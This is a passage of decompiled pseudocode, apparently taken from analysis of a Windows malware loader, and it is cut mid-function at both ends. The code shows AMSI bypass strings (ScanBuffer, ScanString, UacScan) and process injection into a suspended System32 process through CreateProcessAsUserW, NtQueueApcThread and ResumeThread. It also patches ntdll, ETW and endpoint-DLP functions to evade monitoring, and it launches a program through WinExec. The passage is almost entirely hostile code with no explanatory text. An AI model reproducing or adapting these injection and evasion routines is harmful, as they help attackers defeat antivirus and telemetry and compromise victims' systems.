						E032644F4(0x3392870, _v2340);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("Initialize");
						E03264824();
						E03264698( &_v2348, E03264964(_v2352));
						_push(_v2348);
						E032647B0( &_v2360,  *0x33928a8, 0x3286aa0);
						E03264698( &_v2356, E03264964(_v2360));
						_pop(_t6231);
						E03277C04(_v2356,  *0x33928a8, _t6231, __eflags);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("OpenSession");
						E03264824();
						E03264698( &_v2364, E03264964(_v2368));
						_push(_v2364);
						E032647B0( &_v2376,  *0x33928a8, 0x3286aa0);
						E03264698( &_v2372, E03264964(_v2376));
						_pop(_t6236);
						E03277C04(_v2372,  *0x33928a8, _t6236, __eflags);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("ScanString");
						E03264824();
						E03264698( &_v2380, E03264964(_v2384));
						_push(_v2380);
						E032647B0( &_v2392,  *0x33928a8, 0x3286aa0);
						E03264698( &_v2388, E03264964(_v2392));
						_pop(_t6241);
						E03277C04(_v2388,  *0x33928a8, _t6241, __eflags);
						E032648B0( *0x33928d0, 0x3286d40);
						if(__eflags != 0) {
							L32:
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("OpenSession");
							E03264824();
							E03264698( &_v3476, E03264964(_v3480));
							_push(_v3476);
							E032647B0( &_v3488,  *0x33928a8, 0x3286aa0);
							E03264698( &_v3484, E03264964(_v3488));
							_pop(_t6247);
							E03277C04(_v3484,  *0x33928a8, _t6247, __eflags);
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("UacInitialize");
							E03264824();
							E03264698( &_v3492, E03264964(_v3496));
							_push(_v3492);
							E032647B0( &_v3504,  *0x33928a8, 0x3286aa0);
							E03264698( &_v3500, E03264964(_v3504));
							_pop(_t6252);
							E03277C04(_v3500,  *0x33928a8, _t6252, __eflags);
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("ScanBuffer");
							E03264824();
							E03264698( &_v3508, E03264964(_v3512));
							_push(_v3508);
							E032647B0( &_v3520,  *0x33928a8, 0x3286aa0);
							E03264698( &_v3516, E03264964(_v3520));
							_pop(_t6257);
							E03277C04(_v3516,  *0x33928a8, _t6257, __eflags);
							E032648B0( *0x33928c0, 0x3286d40);
							if(__eflags != 0) {
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("ScanString");
								E03264824();
								E03264698( &_v3820, E03264964(_v3824));
								_push(_v3820);
								E032647B0( &_v3832,  *0x33928a8, 0x3286aa0);
								E03264698( &_v3828, E03264964(_v3832));
								_pop(_t6263);
								E03277C04(_v3828,  *0x33928a8, _t6263, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("Initialize");
								E03264824();
								E03264698( &_v3836, E03264964(_v3840));
								_push(_v3836);
								E032647B0( &_v3848,  *0x33928a8, 0x3286aa0);
								E03264698( &_v3844, E03264964(_v3848));
								_pop(_t6268);
								E03277C04(_v3844,  *0x33928a8, _t6268, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("ScanBuffer");
								E03264824();
								E03264698( &_v3852, E03264964(_v3856));
								_push(_v3852);
								E032647B0( &_v3864,  *0x33928a8, 0x3286aa0);
								E03264698( &_v3860, E03264964(_v3864));
								_pop(_t6273);
								E03277C04(_v3860,  *0x33928a8, _t6273, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("ScanString");
								E03264824();
								E03264698( &_v3868, E03264964(_v3872));
								_push(_v3868);
								E032647B0( &_v3880,  *0x33928a8, 0x3286aa0);
								E03264698( &_v3876, E03264964(_v3880));
								_pop(_t6278);
								E03277C04(_v3876,  *0x33928a8, _t6278, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("OpenSession");
								E03264824();
								E03264698( &_v3884, E03264964(_v3888));
								_push(_v3884);
								E032647B0( &_v3896,  *0x33928a8, 0x3286aa0);
								E03264698( &_v3892, E03264964(_v3896));
								_pop(_t6283);
								E03277C04(_v3892,  *0x33928a8, _t6283, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("Initialize");
								E03264824();
								E03264698( &_v3900, E03264964(_v3904));
								_push(_v3900);
								E032647B0( &_v3912,  *0x33928a8, 0x3286aa0);
								E03264698( &_v3908, E03264964(_v3912));
								_pop(_t6288);
								E03277C04(_v3908,  *0x33928a8, _t6288, __eflags);
								E032648B0( *0x33928bc, 0x3286d40);
								if(__eflags == 0) {
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("UacScan");
									E03264824();
									E03264698( &_v3916, E03264964(_v3920));
									_push(_v3916);
									E032647B0( &_v3928,  *0x33928a8, 0x3286aa0);
									E03264698( &_v3924, E03264964(_v3928));
									_pop(_t6538);
									E03277C04(_v3924,  *0x33928a8, _t6538, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("OpenSession");
									E03264824();
									E03264698( &_v3932, E03264964(_v3936));
									_push(_v3932);
									E032647B0( &_v3944,  *0x33928a8, 0x3286aa0);
									E03264698( &_v3940, E03264964(_v3944));
									_pop(_t6543);
									E03277C04(_v3940,  *0x33928a8, _t6543, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("ScanString");
									E03264824();
									E03264698( &_v3948, E03264964(_v3952));
									_push(_v3948);
									E032647B0( &_v3960,  *0x33928a8, 0x3286aa0);
									E03264698( &_v3956, E03264964(_v3960));
									_pop(_t6548);
									E03277C04(_v3956,  *0x33928a8, _t6548, __eflags);
									E032647B0( &_v3968,  *0x3392820, "C:\\Windows\\System32\\");
									E03264D38( &_v3964, E03264964(_v3968));
									_t3979 = CreateProcessAsUserW( *0x3392794, 0, E03264DB4(_v3964), 0, 0, 0, 4, 0, 0, 0x3392798, 0x33927dc);
									__eflags = _t3979;
									if(_t3979 != 0) {
										_push(0x3286aa0);
										_push( *0x33928a8);
										_push("OpenSession");
										E03264824();
										E03264698( &_v3972, E03264964(_v3976));
										_push(_v3972);
										E032647B0( &_v3984,  *0x33928a8, 0x3286aa0);
										E03264698( &_v3980, E03264964(_v3984));
										_pop(_t6620);
										E03277C04(_v3980,  *0x33928a8, _t6620, __eflags);
									}
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("ScanBuffer");
									E03264824();
									E03264698( &_v3988, E03264964(_v3992));
									_push(_v3988);
									E032647B0( &_v4000,  *0x33928a8, 0x3286aa0);
									E03264698( &_v3996, E03264964(_v4000));
									_pop(_t6555);
									E03277C04(_v3996,  *0x33928a8, _t6555, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("UacScan");
									E03264824();
									E03264698( &_v4004, E03264964(_v4008));
									_push(_v4004);
									E032647B0( &_v4016,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4012, E03264964(_v4016));
									_pop(_t6560);
									E03277C04(_v4012,  *0x33928a8, _t6560, __eflags);
									_v1112 =  *0x3392870;
									_t5539 = _v1112;
									__eflags = _t5539;
									if(_t5539 != 0) {
										_t5540 = _t5539 - 4;
										__eflags = _t5540;
										_t5539 =  *_t5540;
									}
									E0327CCC8(0x329e54c, _t5539, E032649BC(0x3392870));
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("ScanBuffer");
									E03264824();
									E03264698( &_v4020, E03264964(_v4024));
									_push(_v4020);
									E032647B0( &_v4032,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4028, E03264964(_v4032));
									_pop(_t6566);
									E03277C04(_v4028,  *0x33928a8, _t6566, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("OpenSession");
									E03264824();
									E03264698( &_v4036, E03264964(_v4040));
									_push(_v4036);
									E032647B0( &_v4048,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4044, E03264964(_v4048));
									_pop(_t6571);
									E03277C04(_v4044,  *0x33928a8, _t6571, __eflags);
									 *0x3392868 = E0327C24C(0x33927dc->hProcess, _t5539, 0x329e54c, _t7104, _t7105);
									__eflags =  *0x3392868;
									if( *0x3392868 != 0) {
										_push(0x3286aa0);
										_push( *0x33928a8);
										_push("OpenSession");
										E03264824();
										E03264698( &_v4052, E03264964(_v4056));
										_push(_v4052);
										E032647B0( &_v4064,  *0x33928a8, 0x3286aa0);
										E03264698( &_v4060, E03264964(_v4064));
										_pop(_t6615);
										E03277C04(_v4060,  *0x33928a8, _t6615, __eflags);
									}
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("Initialize");
									E03264824();
									E03264698( &_v4068, E03264964(_v4072));
									_push(_v4068);
									E032647B0( &_v4080,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4076, E03264964(_v4080));
									_pop(_t6577);
									E03277C04(_v4076,  *0x33928a8, _t6577, __eflags);
									NtQueueApcThread( *0x33927e0,  *0x3392868, 0, 0, 0);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("UacScan");
									E03264824();
									E03264698( &_v4084, E03264964(_v4088));
									_push(_v4084);
									E032647B0( &_v4096,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4092, E03264964(_v4096));
									_pop(_t6582);
									E03277C04(_v4092,  *0x33928a8, _t6582, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("Initialize");
									E03264824();
									E03264698( &_v4100, E03264964(_v4104));
									_push(_v4100);
									E032647B0( &_v4112,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4108, E03264964(_v4112));
									_pop(_t6587);
									E03277C04(_v4108,  *0x33928a8, _t6587, __eflags);
									ResumeThread( *0x33927e0);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("UacScan");
									E03264824();
									E03264698( &_v4116, E03264964(_v4120));
									_push(_v4116);
									E032647B0( &_v4128,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4124, E03264964(_v4128));
									_pop(_t6592);
									E03277C04(_v4124,  *0x33928a8, _t6592, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("OpenSession");
									E03264824();
									E03264698( &_v4132, E03264964(_v4136));
									_push(_v4132);
									E032647B0( &_v4144,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4140, E03264964(_v4144));
									_pop(_t6597);
									E03277C04(_v4140,  *0x33928a8, _t6597, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("ScanBuffer");
									E03264824();
									E03264698( &_v4148, E03264964(_v4152));
									_push(_v4148);
									E032647B0( &_v4160,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4156, E03264964(_v4160));
									_pop(_t6602);
									E03277C04(_v4156,  *0x33928a8, _t6602, __eflags);
									E03277B14(0x33927dc->hProcess, "BCryptVerifySignature");
									E03277B14(0x33927dc->hProcess, "BCryptQueryProviderRegistration");
									E03277B14(0x33927dc->hProcess, "BCryptRegisterProvider");
									E03277B14(0x33927dc->hProcess, "NtReadVirtualMemory");
									E03277B14(0x33927dc->hProcess, "NtOpenObjectAuditAlarm");
									E03277B14(0x33927dc->hProcess, "I_QueryTagInformation");
									E03277B14(0x33927dc->hProcess, "NtSetSecurityObject");
									E03277B14(0x33927dc->hProcess, "NtOpenProcess");
									CloseHandle( *0x33927dc);
								}
								E032648B0( *0x339282c, 0x3286d40);
								if(__eflags == 0) {
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("OpenSession");
									E03264824();
									E03264698( &_v4164, E03264964(_v4168));
									_push(_v4164);
									E032647B0( &_v4176,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4172, E03264964(_v4176));
									_pop(_t6468);
									E03277C04(_v4172,  *0x33928a8, _t6468, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("ScanString");
									E03264824();
									E03264698( &_v4180, E03264964(_v4184));
									_push(_v4180);
									E032647B0( &_v4192,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4188, E03264964(_v4192));
									_pop(_t6473);
									E03277C04(_v4188,  *0x33928a8, _t6473, __eflags);
									_push( *0x339287c);
									_push(0x3286d78);
									E03277CB0( *0x33928cc,  *0x33928a8,  &_v4200);
									_push(_v4200);
									_push(0x3287054);
									_push(0);
									_push(0x3287060);
									_push(0);
									_push(0x328706c);
									E03264824();
									E03264698(0x33928b4, E03264964(_v4196));
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("ScanString");
									E03264824();
									E03264698( &_v4204, E03264964(_v4208));
									_push(_v4204);
									E032647B0( &_v4216,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4212, E03264964(_v4216));
									_pop(_t6481);
									E03277C04(_v4212,  *0x33928a8, _t6481, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("OpenSession");
									E03264824();
									E03264698( &_v4220, E03264964(_v4224));
									_push(_v4220);
									E032647B0( &_v4232,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4228, E03264964(_v4232));
									_pop(_t6486);
									E03277C04(_v4228,  *0x33928a8, _t6486, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("ScanBuffer");
									E03264824();
									E03264698( &_v4236, E03264964(_v4240));
									_push(_v4236);
									E032647B0( &_v4248,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4244, E03264964(_v4248));
									_pop(_t6491);
									E03277C04(_v4244,  *0x33928a8, _t6491, __eflags);
									_t3812 = E03267E40( *0x33928b4);
									__eflags = _t3812;
									if(_t3812 == 0) {
										_push(0x3286aa0);
										_push( *0x33928a8);
										_push("UacScan");
										E03264824();
										E03264698( &_v4252, E03264964(_v4256));
										_push(_v4252);
										E032647B0( &_v4264,  *0x33928a8, 0x3286aa0);
										E03264698( &_v4260, E03264964(_v4264));
										_pop(_t6512);
										E03277C04(_v4260,  *0x33928a8, _t6512, __eflags);
										_push(0x3286aa0);
										_push( *0x33928a8);
										_push("ScanBuffer");
										E03264824();
										E03264698( &_v4268, E03264964(_v4272));
										_push(_v4268);
										E032647B0( &_v4280,  *0x33928a8, 0x3286aa0);
										E03264698( &_v4276, E03264964(_v4280));
										_pop(_t6517);
										E03277C04(_v4276,  *0x33928a8, _t6517, __eflags);
										E0327CE58(0x3289d58,  &_v4284, 0x109ff);
										E032644F4(0x3392844, _v4284);
										_push(0x3286aa0);
										_push( *0x33928a8);
										_push("UacScan");
										E03264824();
										E03264698( &_v4288, E03264964(_v4292));
										_push(_v4288);
										E032647B0( &_v4300,  *0x33928a8, 0x3286aa0);
										E03264698( &_v4296, E03264964(_v4300));
										_pop(_t6524);
										E03277C04(_v4296,  *0x33928a8, _t6524, __eflags);
										_push(0x3286aa0);
										_push( *0x33928a8);
										_push("ScanString");
										E03264824();
										E03264698( &_v4304, E03264964(_v4308));
										_push(_v4304);
										E032647B0( &_v4316,  *0x33928a8, 0x3286aa0);
										E03264698( &_v4312, E03264964(_v4316));
										_pop(_t6529);
										E03277C04(_v4312,  *0x33928a8, _t6529, __eflags);
										E03264DA4( &_v4320,  *0x33928b4);
										_push(_v4320);
										E03264DA4( &_v4328,  *0x3392844);
										E03264728( &_v4324, _v4328);
										_pop(_t6533);
										E0327CB04(_v4324, _t5539, _t6533, _t7105);
									}
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("Initialize");
									E03264824();
									E03264698( &_v4332, E03264964(_v4336));
									_push(_v4332);
									E032647B0( &_v4344,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4340, E03264964(_v4344));
									_pop(_t6496);
									E03277C04(_v4340,  *0x33928a8, _t6496, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("OpenSession");
									E03264824();
									E03264698( &_v4348, E03264964(_v4352));
									_push(_v4348);
									E032647B0( &_v4360,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4356, E03264964(_v4360));
									_pop(_t6501);
									E03277C04(_v4356,  *0x33928a8, _t6501, __eflags);
									_push(0x3286aa0);
									_push( *0x33928a8);
									_push("ScanBuffer");
									E03264824();
									E03264698( &_v4364, E03264964(_v4368));
									_push(_v4364);
									E032647B0( &_v4376,  *0x33928a8, 0x3286aa0);
									E03264698( &_v4372, E03264964(_v4376));
									_pop(_t6506);
									E03277C04(_v4372,  *0x33928a8, _t6506, __eflags);
									E03277F54( *0x33928b4, _t5539, E032649BC(0x3392870), _t7104, _t7105, _t7125);
								}
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("Initialize");
								E03264824();
								E03264698( &_v4380, E03264964(_v4384));
								_push(_v4380);
								E032647B0( &_v4392,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4388, E03264964(_v4392));
								_pop(_t6295);
								E03277C04(_v4388,  *0x33928a8, _t6295, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("OpenSession");
								E03264824();
								E03264698( &_v4396, E03264964(_v4400));
								_push(_v4396);
								E032647B0( &_v4408,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4404, E03264964(_v4408));
								_pop(_t6300);
								E03277C04(_v4404,  *0x33928a8, _t6300, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("ScanString");
								E03264824();
								E03264698( &_v4412, E03264964(_v4416));
								_push(_v4412);
								E032647B0( &_v4424,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4420, E03264964(_v4424));
								_pop(_t6305);
								E03277C04(_v4420,  *0x33928a8, _t6305, __eflags);
								E03264698( &_v4428, "BCryptVerifySignature");
								_push(_v4428);
								E03264698( &_v4432, "bcrypt");
								_pop(_t6308);
								E03277C04(_v4432,  *0x33928a8, _t6308, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("OpenSession");
								E03264824();
								E03264698( &_v4436, E03264964(_v4440));
								_push(_v4436);
								E032647B0( &_v4448,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4444, E03264964(_v4448));
								_pop(_t6313);
								E03277C04(_v4444,  *0x33928a8, _t6313, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("Initialize");
								E03264824();
								E03264698( &_v4452, E03264964(_v4456));
								_push(_v4452);
								E032647B0( &_v4464,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4460, E03264964(_v4464));
								_pop(_t6318);
								E03277C04(_v4460,  *0x33928a8, _t6318, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("ScanBuffer");
								E03264824();
								E03264698( &_v4468, E03264964(_v4472));
								_push(_v4468);
								_t5632 =  *0x33928a8;
								E032647B0( &_v4480,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4476, E03264964(_v4480));
								_pop(_t6323);
								E03277C04(_v4476,  *0x33928a8, _t6323, __eflags);
								E03264698( &_v4484, "DlpNotifyPreDragDrop");
								_push(_v4484);
								E03264698( &_v4488, "endpointdlp");
								_pop(_t6326);
								E03277C04(_v4488,  *0x33928a8, _t6326, __eflags);
								E03264698( &_v4492, "DlpCheckIsCloudSyncApp");
								_push(_v4492);
								E03264698( &_v4496, "endpointdlp");
								_pop(_t6329);
								E03277C04(_v4496,  *0x33928a8, _t6329, __eflags);
								E03264698( &_v4500, "DlpGetArchiveFileTraceInfo");
								_push(_v4500);
								E03264698( &_v4504, "endpointdlp");
								_pop(_t6332);
								E03277C04(_v4504,  *0x33928a8, _t6332, __eflags);
								E03264698( &_v4508, "DlpGetWebSiteAccess");
								_push(_v4508);
								E03264698( &_v4512, "endpointdlp");
								_pop(_t6335);
								E03277C04(_v4512, _t5632, _t6335, __eflags);
								E03264698( &_v4516, "NtAlertResumeThread");
								_push(_v4516);
								E03264698( &_v4520, "ntdll");
								_pop(_t6338);
								E03277C04(_v4520, _t5632, _t6338, __eflags);
								E03264698( &_v4524, "RtlAllocateHeap");
								_push(_v4524);
								E03264698( &_v4528, "ntdll");
								_pop(_t6341);
								E03277C04(_v4528, _t5632, _t6341, __eflags);
								E03264698( &_v4532, "NtWaitForSingleObject");
								_push(_v4532);
								E03264698( &_v4536, "ntdll");
								_pop(_t6344);
								E03277C04(_v4536, _t5632, _t6344, __eflags);
								E03264698( &_v4540, "RtlAllocateHeap");
								_push(_v4540);
								E03264698( &_v4544, "ntdll");
								_pop(_t6347);
								E03277C04(_v4544, _t5632, _t6347, __eflags);
								E03264698( &_v4548, "RtlCreateQueryDebugBuffer");
								_push(_v4548);
								E03264698( &_v4552, "ntdll");
								_pop(_t6350);
								E03277C04(_v4552, _t5632, _t6350, __eflags);
								E03277C04(0x3287160, _t5632, "NtQuerySystemInformation", __eflags);
								E03277C04(0x3287160, _t5632, "NtDeviceIoControlFile", __eflags);
								E03277C04(0x3287160, _t5632, "NtQueryDirectoryFile", __eflags);
								E03277C04(0x3287160, _t5632, "RtlQueryProcessDebugInformation", __eflags);
								E03277C04("Advapi", _t5632, "EnumServicesStatusA", __eflags);
								E03277C04("Advapi", _t5632, "EnumServicesStatusW", __eflags);
								E03277C04("Advapi", _t5632, "EnumServicesStatusExA", __eflags);
								E03277C04("Advapi", _t5632, "EnumServicesStatusExW", __eflags);
								E03277C04(0x328727c, _t5632, "EnumProcessModules", __eflags);
								E03277C04("Kernel32", _t5632, "CreateProcessA", __eflags);
								E03277C04("Kernel32", _t5632, "CreateProcessW", __eflags);
								E03277C04("Advapi", _t5632, "CreateProcessAsUserA", __eflags);
								E03277C04("Advapi", _t5632, "CreateProcessAsUserW", __eflags);
								E03277C04("Advapi", _t5632, "CreateProcessWithLogonW", __eflags);
								E03277C04("ws2_32", _t5632, "connect", __eflags);
								E03277C04("Kernel32", _t5632, "CreateProcessAsUserW", __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("UacInitialize");
								E03264824();
								E03264698( &_v4556, E03264964(_v4560));
								_push(_v4556);
								E032647B0( &_v4568,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4564, E03264964(_v4568));
								_pop(_t6371);
								E03277C04(_v4564,  *0x33928a8, _t6371, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("OpenSession");
								E03264824();
								E03264698( &_v4572, E03264964(_v4576));
								_push(_v4572);
								E032647B0( &_v4584,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4580, E03264964(_v4584));
								_pop(_t6376);
								E03277C04(_v4580,  *0x33928a8, _t6376, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("ScanString");
								E03264824();
								E03264698( &_v4588, E03264964(_v4592));
								_push(_v4588);
								_t5635 =  *0x33928a8;
								E032647B0( &_v4600,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4596, E03264964(_v4600));
								_pop(_t6381);
								E03277C04(_v4596,  *0x33928a8, _t6381, __eflags);
								E03264698( &_v4604, "VirtualAlloc");
								_push(_v4604);
								E03264698( &_v4608, "kernel32");
								_pop(_t6384);
								E03277C04(_v4608,  *0x33928a8, _t6384, __eflags);
								E03264698( &_v4612, "VirtualAllocEx");
								_push(_v4612);
								E03264698( &_v4616, "kernel32");
								_pop(_t6387);
								E03277C04(_v4616,  *0x33928a8, _t6387, __eflags);
								E03264698( &_v4620, "VirtualProtect");
								_push(_v4620);
								E03264698( &_v4624, "kernel32");
								_pop(_t6390);
								E03277C04(_v4624,  *0x33928a8, _t6390, __eflags);
								E03264698( &_v4628, "OpenProcess");
								_push(_v4628);
								E03264698( &_v4632, "kernel32");
								_pop(_t6393);
								E03277C04(_v4632, _t5635, _t6393, __eflags);
								E03264698( &_v4636, "WriteVirtualMemory");
								_push(_v4636);
								E03264698( &_v4640, "kernel32");
								_pop(_t6396);
								E03277C04(_v4640, _t5635, _t6396, __eflags);
								E03264698( &_v4644, "FlushInstructionCache");
								_push(_v4644);
								E03264698( &_v4648, "kernel32");
								_pop(_t6399);
								E03277C04(_v4648, _t5635, _t6399, __eflags);
								E03264698( &_v4652, "SetUnhandledExceptionFilter");
								_push(_v4652);
								E03264698( &_v4656, "kernel32");
								_pop(_t6402);
								E03277C04(_v4656, _t5635, _t6402, __eflags);
								E03264698( &_v4660, "NtGetWriteWatch");
								_push(_v4660);
								E03264698( &_v4664, "ntdll");
								_pop(_t6405);
								E03277C04(_v4664, _t5635, _t6405, __eflags);
								E03264698( &_v4668, "NtQueryVirtualMemory");
								_push(_v4668);
								E03264698( &_v4672, "ntdll");
								_pop(_t6408);
								E03277C04(_v4672, _t5635, _t6408, __eflags);
								E03264698( &_v4676, "NtQueryInformationThread");
								_push(_v4676);
								E03264698( &_v4680, "ntdll");
								_pop(_t6411);
								E03277C04(_v4680, _t5635, _t6411, __eflags);
								E03264698( &_v4684, "NtOpenSection");
								_push(_v4684);
								E03264698( &_v4688, "ntdll");
								_pop(_t6414);
								E03277C04(_v4688, _t5635, _t6414, __eflags);
								E03264698( &_v4692, "NtCreateSection");
								_push(_v4692);
								E03264698( &_v4696, "ntdll");
								_pop(_t6417);
								E03277C04(_v4696, _t5635, _t6417, __eflags);
								E03264698( &_v4700, "NtMapViewOfSection");
								_push(_v4700);
								E03264698( &_v4704, "ntdll");
								_pop(_t6420);
								E03277C04(_v4704, _t5635, _t6420, __eflags);
								E03264698( &_v4708, "NtReadVirtualMemory");
								_push(_v4708);
								E03264698( &_v4712, "ntdll");
								_pop(_t6423);
								E03277C04(_v4712, _t5635, _t6423, __eflags);
								E03264698( &_v4716, "NtQuerySecurityObject");
								_push(_v4716);
								E03264698( &_v4720, "ntdll");
								_pop(_t6426);
								E03277C04(_v4720, _t5635, _t6426, __eflags);
								E03264698( &_v4724, "NtAccessCheck");
								_push(_v4724);
								E03264698( &_v4728, "ntdll");
								_pop(_t6429);
								E03277C04(_v4728, _t5635, _t6429, __eflags);
								E03264698( &_v4732, "LdrLoadDll");
								_push(_v4732);
								E03264698( &_v4736, "ntdll");
								_pop(_t6432);
								E03277C04(_v4736, _t5635, _t6432, __eflags);
								E03264698( &_v4740, "LdrGetProcedureAddress");
								_push(_v4740);
								E03264698( &_v4744, "ntdll");
								_pop(_t6435);
								E03277C04(_v4744, _t5635, _t6435, __eflags);
								E03264698( &_v4748, "NtWriteVirtualMemory");
								_push(_v4748);
								E03264698( &_v4752, "ntdll");
								_pop(_t6438);
								E03277C04(_v4752, _t5635, _t6438, __eflags);
								E03264698( &_v4756, "NtOpenFile");
								_push(_v4756);
								E03264698( &_v4760, "ntdll");
								_pop(_t6441);
								E03277C04(_v4760, _t5635, _t6441, __eflags);
								E03264698( &_v4764, "EtwEventWriteEx");
								_push(_v4764);
								E03264698( &_v4768, "ntdll");
								_pop(_t6444);
								E03277C04(_v4768, _t5635, _t6444, __eflags);
								E03264698( &_v4772, "EtwEventWrite");
								_push(_v4772);
								E03264698( &_v4776, "ntdll");
								_pop(_t6447);
								E03277C04(_v4776, _t5635, _t6447, __eflags);
								FlushInstructionCache(GetCurrentProcess(), 0, 0);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("Initialize");
								E03264824();
								E03264698( &_v4780, E03264964(_v4784));
								_push(_v4780);
								E032647B0( &_v4792,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4788, E03264964(_v4792));
								_pop(_t6452);
								E03277C04(_v4788,  *0x33928a8, _t6452, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("ScanBuffer");
								E03264824();
								E03264698( &_v4796, E03264964(_v4800));
								_push(_v4796);
								E032647B0( &_v4808,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4804, E03264964(_v4808));
								_pop(_t6457);
								E03277C04(_v4804,  *0x33928a8, _t6457, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("OpenSession");
								E03264824();
								E03264698( &_v4812, E03264964(_v4816));
								_push(_v4812);
								E032647B0( &_v4824,  *0x33928a8, 0x3286aa0);
								E03264698( &_v4820, E03264964(_v4824));
								_pop(_t6462);
								E03277C04(_v4820,  *0x33928a8, _t6462, __eflags);
								E03277B14(GetCurrentProcess(), "NtOpenProcess");
								ExitProcess(0);
								goto L49;
							} else {
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("OpenSession");
								E03264824();
								E03264698( &_v3524, E03264964(_v3528));
								_push(_v3524);
								E032647B0( &_v3536,  *0x33928a8, 0x3286aa0);
								E03264698( &_v3532, E03264964(_v3536));
								_pop(_t6625);
								E03277C04(_v3532,  *0x33928a8, _t6625, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("ScanString");
								E03264824();
								E03264698( &_v3540, E03264964(_v3544));
								_push(_v3540);
								E032647B0( &_v3552,  *0x33928a8, 0x3286aa0);
								E03264698( &_v3548, E03264964(_v3552));
								_pop(_t6630);
								E03277C04(_v3548,  *0x33928a8, _t6630, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("OpenSession");
								E03264824();
								E03264698( &_v3556, E03264964(_v3560));
								_push(_v3556);
								E032647B0( &_v3568,  *0x33928a8, 0x3286aa0);
								E03264698( &_v3564, E03264964(_v3568));
								_pop(_t6635);
								E03277C04(_v3564,  *0x33928a8, _t6635, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("ScanString");
								E03264824();
								E03264698( &_v3572, E03264964(_v3576));
								_push(_v3572);
								E032647B0( &_v3584,  *0x33928a8, 0x3286aa0);
								E03264698( &_v3580, E03264964(_v3584));
								_pop(_t6640);
								E03277C04(_v3580,  *0x33928a8, _t6640, __eflags);
								E032647B0( &_v3588,  *0x3392820, "C:\\Windows\\System32\\");
								WinExec(E03264964(_v3588), 0);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("ScanBuffer");
								E03264824();
								E03264698( &_v3592, E03264964(_v3596));
								_push(_v3592);
								E032647B0( &_v3604,  *0x33928a8, 0x3286aa0);
								E03264698( &_v3600, E03264964(_v3604));
								_pop(_t6646);
								E03277C04(_v3600,  *0x33928a8, _t6646, __eflags);
								E03264698( &_v3608, E03264964( *0x3392820));
								E0327A3A4(_v3608, _t5539, 0x3392888, _t7104, _t7105, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("Initialize");
								E03264824();
